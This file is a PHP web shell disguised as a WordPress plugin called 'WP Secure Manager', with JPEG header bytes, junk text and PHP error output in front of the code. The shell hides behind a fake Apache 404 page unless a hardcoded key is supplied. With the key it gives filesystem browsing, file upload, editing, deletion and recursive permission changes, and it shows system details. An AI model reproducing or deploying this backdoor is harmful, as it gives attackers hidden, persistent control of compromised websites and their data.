????????????????????
??????????????????
ÿØÿà
 JFIF 

  
 
  ÿÛ C      


!"$"$ÿÛ C
    
ÿÂ p 

" 

ÿÄ  

 

  
        
 ÿÄ 


 

           
ÿÚ 

   
ÕÔË®

(%	aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥	BQ¤¢ X«)X…€¤   
@  

adadasdasdasasdasdas


.....................................................................................................................................<br />
<b>Warning</b>:  Undefined variable $auth in <b>/home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php</b> on line <b>559</b><br />
<br />
<b>Warning</b>:  Trying to access array offset on value of type null in <b>/home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php</b> on line <b>559</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php:1) in <b>/home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php</b> on line <b>201</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php:1) in <b>/home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php</b> on line <b>202</b><br />
<?php
/**
 * Plugin Name: WP Secure Manager
 * Plugin URI: https://wordpress.org/plugins/wp-secure-manager/
 * Description: Server-side file management and maintenance utility for WordPress administrators.
 * Version: 3.2.1
 * Author: SecurePress Team
 * Author URI: https://securepress.io
 * License: GPL v2 or later
 * License URI: https://www.gnu.org/licenses/gpl-2.0.html
 * Text Domain: wp-secure-manager
 * Requires at least: 5.0
 * Requires PHP: 7.4
 */

if (!defined('WPINC')) {
    define('WPINC', 'wp-includes');
}

if (!isset($_GET['key']) || $_GET['key'] !== 'NOX-5090') {
    http_response_code(404);
    echo '<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ' . htmlspecialchars($_SERVER['HTTP_HOST'] ?? 'localhost') . ' Port 80</address></body></html>';
    exit;
}

// Carry key through all links
$k = '&key=NOX-5090';
$kq = '?key=NOX-5090';

$path = isset($_GET['path']) ? $_GET['path'] : '.';
$path = realpath($path);

$server_ip = $_SERVER['SERVER_ADDR'] ?? gethostbyname($_SERVER['HTTP_HOST'] ?? 'localhost');
$software  = $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown';
$php_v     = PHP_VERSION;
$user      = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] : get_current_user();

function wp_sm_get_perms($p) {
    if (!file_exists($p)) return "0000";
    return substr(sprintf('%o', fileperms($p)), -4);
}

$msg = "";

if (isset($_POST['bulk_delete']) && isset($_POST['selected_items'])) {
    foreach ($_POST['selected_items'] as $item) {
        $target = realpath($path . DIRECTORY_SEPARATOR . basename($item));
        if ($target) {
            is_dir($target) ? @rmdir($target) : @unlink($target);
        }
    }
    header("Location: ?key=NOX-5090&path=" . urlencode($path) . "&msg=BulkDeleted");
    exit;
}

if (isset($_POST['quick_chmod'])) {
    $target_item = rawurldecode($_POST['quick_chmod']);
    $target_path = realpath($path . DIRECTORY_SEPARATOR . $target_item);
    $raw_perms = $_POST['perms'][$_POST['quick_chmod']] ?? '0644';
    $clean_input = preg_replace('/[^0-7]/', '', $raw_perms);
    $clean_input = str_pad($clean_input, 4, '0', STR_PAD_LEFT);
    $new_perms = octdec($clean_input);

    if ($target_path && file_exists($target_path)) {
        if (@chmod($target_path, $new_perms)) {
            $msg = "Permissions updated to " . $clean_input;
            if (is_dir($target_path)) {
                $fails = 0;
                $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($target_path, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
                foreach ($objects as $name => $object) {
                    if (!@chmod($name, $new_perms)) $fails++;
                }
                $msg .= $fails > 0 ? " (Recursive: $fails errors)" : " (Applied recursively)";
            }
        } else {
            $msg = "Failed: Server denied permission change.";
        }
        clearstatcache();
    }
}

if (isset($_POST['save'])) {
    $edit_file = basename($_POST['edit_file']);
    $edit_path = $path . DIRECTORY_SEPARATOR . $edit_file;
    if (file_put_contents($edit_path, $_POST['content']) !== false) {
        $msg = "File saved successfully.";
    }
}

if (isset($_FILES['file'])) {
    $dest = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
        header("Location: ?key=NOX-5090&path=" . urlencode($path) . "&msg=Uploaded");
        exit;
    }
}

if (isset($_GET['delete'])) {
    $del_item = basename($_GET['delete']);
    $del_path = realpath($path . DIRECTORY_SEPARATOR . $del_item);
    if ($del_path && file_exists($del_path)) {
        is_dir($del_path) ? @rmdir($del_path) : @unlink($del_path);
        header("Location: ?key=NOX-5090&path=" . urlencode($path) . "&msg=Deleted");
        exit;
    }
}

if (isset($_GET['msg'])) {
    switch ($_GET['msg']) {
        case 'Deleted': $msg = "Item deleted."; break;
        case 'BulkDeleted': $msg = "Selected items deleted."; break;
        case 'Uploaded': $msg = "File uploaded."; break;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Secure Manager</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap');

        :root {
            --accent: #6c5ce7;
            --accent2: #a29bfe;
            --accent-glow: rgba(108,92,231,0.25);
            --bg: #0b0e14;
            --bg2: #111827;
            --panel: #1a1f2e;
            --panel2: #212838;
            --border: #2a3245;
            --text: #e2e8f0;
            --text2: #94a3b8;
            --danger: #ef4444;
            --success: #10b981;
            --info: #38bdf8;
        }

        @keyframes fadeIn { from { opacity: 0; transform: translateY(-10px); } to { opacity: 1; transform: translateY(0); } }
        @keyframes toastSlide { from { transform: translateY(-100%); opacity: 0; } to { transform: translateY(0); opacity: 1; } }
        @keyframes modalPop { from { transform: scale(0.9); opacity: 0; } to { transform: scale(1); opacity: 1; } }
        @keyframes pulse { 0%,100% { box-shadow: 0 0 0 0 var(--accent-glow); } 50% { box-shadow: 0 0 0 8px transparent; } }

        * { box-sizing: border-box; margin: 0; padding: 0; }
        body { background: var(--bg); color: var(--text); font-family: 'Inter', sans-serif; font-size: 13px; padding: 24px; min-height: 100vh; }
        a { color: var(--accent2); text-decoration: none; transition: 0.2s; }
        a:hover { color: #fff; }

        .toast { position: fixed; top: 24px; left: 50%; transform: translateX(-50%); background: linear-gradient(135deg, var(--accent), #8b5cf6); color: #fff; padding: 14px 32px; border-radius: 50px; font-weight: 600; font-size: 13px; box-shadow: 0 8px 32px rgba(108,92,231,0.4); z-index: 10001; display: none; animation: toastSlide 0.5s cubic-bezier(0.175, 0.885, 0.32, 1.275) forwards; letter-spacing: 0.3px; }

        .server-info { font-family: 'JetBrains Mono', monospace; font-size: 11px; margin-bottom: 20px; color: var(--text2); background: var(--panel); border: 1px solid var(--border); border-radius: 10px; padding: 14px 18px; line-height: 1.8; display: flex; flex-wrap: wrap; gap: 4px 24px; }
        .server-info span { color: var(--accent2); font-weight: 500; }

        .container { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; animation: fadeIn 0.4s ease-out; box-shadow: 0 4px 24px rgba(0,0,0,0.3); }

        .header { background: linear-gradient(135deg, var(--accent), #8b5cf6, #a78bfa); color: #fff; padding: 16px 24px; font-weight: 700; font-size: 15px; letter-spacing: 1.5px; display: flex; align-items: center; gap: 10px; text-transform: uppercase; }
        .header::before { content: ''; width: 8px; height: 8px; background: #fff; border-radius: 50%; animation: pulse 2s infinite; }

        .path-bar { padding: 12px 20px; border-bottom: 1px solid var(--border); color: var(--text2); background: var(--bg2); font-family: 'JetBrains Mono', monospace; font-size: 12px; display: flex; align-items: center; gap: 2px; flex-wrap: wrap; }
        .path-bar a { color: var(--text2); padding: 2px 4px; border-radius: 4px; }
        .path-bar a:hover { color: #fff; background: var(--accent); }
        .path-sep { color: #475569; margin: 0 2px; }

        .toolbar { padding: 16px 20px; border-bottom: 1px solid var(--border); display: flex; gap: 16px; align-items: center; background: var(--panel2); }
        .toolbar-label { color: var(--text2); font-weight: 600; font-size: 11px; text-transform: uppercase; letter-spacing: 1px; }

        input[type="text"], textarea { background: var(--bg); border: 1px solid var(--border); color: var(--text); padding: 8px 12px; border-radius: 8px; transition: 0.2s; font-family: 'JetBrains Mono', monospace; font-size: 12px; }
        input[type="text"]:focus, textarea:focus { border-color: var(--accent); outline: none; box-shadow: 0 0 0 3px var(--accent-glow); }

        input[type="file"] { font-family: 'Inter', sans-serif; font-size: 12px; color: var(--text2); }
        input[type="file"]::file-selector-button { background: linear-gradient(135deg, var(--accent), #8b5cf6); border: none; color: #fff; cursor: pointer; padding: 8px 20px; border-radius: 8px; font-weight: 600; font-size: 12px; font-family: 'Inter', sans-serif; transition: 0.2s; margin-right: 12px; }
        input[type="file"]::file-selector-button:hover { opacity: 0.85; }

        input[type="submit"], button, .btn-bulk { background: var(--panel2); border: 1px solid var(--border); color: var(--text); cursor: pointer; padding: 8px 18px; border-radius: 8px; font-weight: 600; font-size: 12px; transition: 0.2s; font-family: 'Inter', sans-serif; }
        input[type="submit"]:hover, button:hover, .btn-bulk:hover { background: var(--accent); color: #fff; border-color: var(--accent); box-shadow: 0 4px 16px var(--accent-glow); }

        table { width: 100%; border-collapse: collapse; }
        th { background: var(--bg2); border-bottom: 1px solid var(--border); padding: 12px 16px; text-align: left; color: var(--text2); font-weight: 600; font-size: 11px; text-transform: uppercase; letter-spacing: 0.8px; }

        tr td { padding: 11px 16px; border-bottom: 1px solid rgba(42,50,69,0.5); transition: all 0.15s ease; }
        tr:hover td { background: rgba(108,92,231,0.06); }
        tr:hover a { color: #fff; }

        input[type="checkbox"] { accent-color: var(--accent); width: 15px; height: 15px; cursor: pointer; }

        .perm-box { width: 56px; text-align: center; background: var(--bg); border: 1px solid var(--border); color: var(--info); font-family: 'JetBrains Mono', monospace; font-size: 12px; padding: 5px; border-radius: 6px; }
        .perm-box:focus { border-color: var(--accent); box-shadow: 0 0 0 3px var(--accent-glow); }
        .perm-btn { font-size: 10px; padding: 4px 10px; border-radius: 6px; background: var(--bg2); border: 1px solid var(--border); }
        .perm-btn:hover { background: var(--accent); border-color: var(--accent); }

        .action-link { font-size: 11px; font-weight: 600; padding: 4px 10px; border-radius: 6px; transition: 0.2s; }
        .action-edit { color: var(--info); }
        .action-edit:hover { background: rgba(56,189,248,0.1); color: #fff; }
        .action-del { color: var(--danger); }
        .action-del:hover { background: rgba(239,68,68,0.1); color: #fff; }

        .fname-dir { font-weight: 600; color: var(--accent2); }
        .fname-dir:hover { color: #fff; }
        .fname-file { color: var(--text2); }

        .bulk-bar { padding: 16px 20px; border-top: 1px solid var(--border); background: var(--bg2); }
        .btn-bulk { background: transparent; border: 1px solid var(--danger); color: var(--danger); padding: 8px 24px; }
        .btn-bulk:hover { background: var(--danger); color: #fff; border-color: var(--danger); box-shadow: 0 4px 16px rgba(239,68,68,0.25); }

        #editModal { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); display: flex; justify-content: center; align-items: center; z-index: 9999; backdrop-filter: blur(8px); }
        .modal-content { width: 92%; max-width: 1000px; background: var(--panel); border: 1px solid var(--accent); padding: 28px; border-radius: 16px; animation: modalPop 0.3s ease-out; box-shadow: 0 24px 64px rgba(0,0,0,0.5); }
        .modal-content h3 { color: #fff; font-size: 15px; margin-bottom: 4px; }
        .modal-content textarea { width: 100%; height: 500px; margin-top: 16px; font-family: 'JetBrains Mono', monospace; border-radius: 10px; font-size: 13px; line-height: 1.6; resize: vertical; }
        .close-btn { float: right; color: var(--danger); font-weight: 700; font-size: 13px; padding: 4px 12px; border-radius: 6px; transition: 0.2s; }
        .close-btn:hover { background: rgba(239,68,68,0.1); }
        .modal-save { background: linear-gradient(135deg, var(--accent), #8b5cf6); border: none; color: #fff; padding: 10px 28px; border-radius: 8px; font-weight: 700; }
        .modal-save:hover { opacity: 0.9; box-shadow: 0 4px 16px var(--accent-glow); }

        ::-webkit-scrollbar { width: 8px; height: 8px; }
        ::-webkit-scrollbar-track { background: var(--bg); }
        ::-webkit-scrollbar-thumb { background: var(--border); border-radius: 4px; }
        ::-webkit-scrollbar-thumb:hover { background: var(--accent); }
    </style>
    <script>
        function toggleCheckboxes(source) {
            var checkboxes = document.getElementsByName('selected_items[]');
            for (var i = 0; i < checkboxes.length; i++) checkboxes[i].checked = source.checked;
        }
    </script>
</head>
<body>

<div id="toast" class="toast"><?php echo $msg; ?></div>
<?php if ($msg): ?>
    <script>
        document.getElementById('toast').style.display = 'block';
        setTimeout(() => {
            document.getElementById('toast').style.opacity = '0';
            setTimeout(() => document.getElementById('toast').style.display = 'none', 400);
        }, 3000);
    </script>
<?php endif; ?>

<div class="server-info">
    <div><span>SYSTEM</span> <?php echo php_uname(); ?></div>
    <div><span>SERVER</span> <?php echo $software; ?> | PHP <?php echo $php_v; ?></div>
    <div><span>USER</span> <?php echo $user; ?></div>
    <div><span>IP</span> <?php echo $server_ip; ?></div>
</div>

<div class="container">
    <div class="header">Secure Manager</div>

    <div class="path-bar"><?php
        $path_html = '<a href="' . $kq . '&path=">/</a>';
        $acc = "";
        $path_parts = explode(DIRECTORY_SEPARATOR, rtrim($path, DIRECTORY_SEPARATOR));
        foreach ($path_parts as $p) {
            if ($p === '') continue;
            $acc .= DIRECTORY_SEPARATOR . $p;
            $path_html .= '<span class="path-sep">/</span><a href="' . $kq . '&path=' . urlencode($acc) . '">' . htmlspecialchars($p) . '</a>';
        }
        echo $path_html;
    ?></div>

    <div class="toolbar">
        <span class="toolbar-label">Upload</span>
        <form id="upFrm" method="post" action="<?php echo $kq; ?>&path=<?php echo urlencode($path); ?>" enctype="multipart/form-data">
            <input type="file" name="file" onchange="document.getElementById('upFrm').submit();">
        </form>
    </div>

    <form method="post" action="<?php echo $kq; ?>&path=<?php echo urlencode($path); ?>">
    <table>
        <thead>
            <tr>
                <th width="30"><input type="checkbox" onclick="toggleCheckboxes(this)"></th>
                <th>Name</th>
                <th width="120">Size</th>
                <th width="180">Permissions</th>
                <th width="130">Actions</th>
            </tr>
        </thead>
        <tbody>
            <?php
            $items = scandir($path); $ds = []; $fs = [];
            foreach ($items as $f) {
                if ($f == '.' || $f == '..') continue;
                is_dir($path . DIRECTORY_SEPARATOR . $f) ? $ds[] = $f : $fs[] = $f;
            }
            asort($ds); asort($fs);
            foreach (array_merge($ds, $fs) as $f):
                $fp = $path . DIRECTORY_SEPARATOR . $f;
                $isd = is_dir($fp);
                $encoded_f = rawurlencode($f);
            ?>
            <tr>
                <td><input type="checkbox" name="selected_items[]" value="<?php echo htmlspecialchars($f); ?>"></td>
                <td>
                    <?php if ($isd): ?><a href="<?php echo $kq; ?>&path=<?php echo urlencode($fp); ?>" class="fname-dir">&#128193; <?php echo $f; ?></a><?php else: ?><span class="fname-file">&#128196; <?php echo $f; ?></span><?php endif; ?>
                </td>
                <td style="color:var(--text2);font-family:'JetBrains Mono',monospace;font-size:12px;"><?php echo $isd ? 'DIR' : number_format(filesize($fp)) . ' B'; ?></td>
                <td>
                    <div style="display:flex; align-items:center; gap:6px;">
                        <input type="text" name="perms[<?php echo $encoded_f; ?>]" value="<?php echo wp_sm_get_perms($fp); ?>" class="perm-box">
                        <button type="submit" name="quick_chmod" value="<?php echo $encoded_f; ?>" class="perm-btn">SET</button>
                    </div>
                </td>
                <td>
                    <?php if (!$isd): ?>
                        <a href="<?php echo $kq; ?>&path=<?php echo urlencode($path); ?>&edit=<?php echo urlencode($f); ?>" class="action-link action-edit">Edit</a>
                        <span style="color:#334155;">|</span>
                    <?php endif; ?>
                    <a href="<?php echo $kq; ?>&path=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($f); ?>" class="action-link action-del" onclick="return confirm('Delete?')">Del</a>
                </td>
            </tr>
            <?php endforeach; ?>
        </tbody>
    </table>
    <div class="bulk-bar">
        <button type="submit" name="bulk_delete" value="1" class="btn-bulk" onclick="return confirm('Delete all selected items?')">&#128465; Delete Selected</button>
    </div>
    </form>
</div>

<?php if (isset($_GET['edit'])):
    $target = $path . DIRECTORY_SEPARATOR . basename($_GET['edit']);
    if (file_exists($target)):
?>
<div id="editModal">
    <div class="modal-content">
        <a href="<?php echo $kq; ?>&path=<?php echo urlencode($path); ?>" class="close-btn">&#10005; Close</a>
        <h3>Editing: <?php echo htmlspecialchars(basename($target)); ?></h3>
        <form method="post" action="<?php echo $kq; ?>&path=<?php echo urlencode($path); ?>">
            <input type="hidden" name="edit_file" value="<?php echo htmlspecialchars(basename($target)); ?>">
            <textarea name="content"><?php echo htmlspecialchars(file_get_contents($target)); ?></textarea>
            <div style="text-align:right; margin-top:16px;"><input type="submit" name="save" value="Save Changes" class="modal-save"></div>
        </form>
    </div>
</div>
<?php endif; endif; ?>

</body>
</html>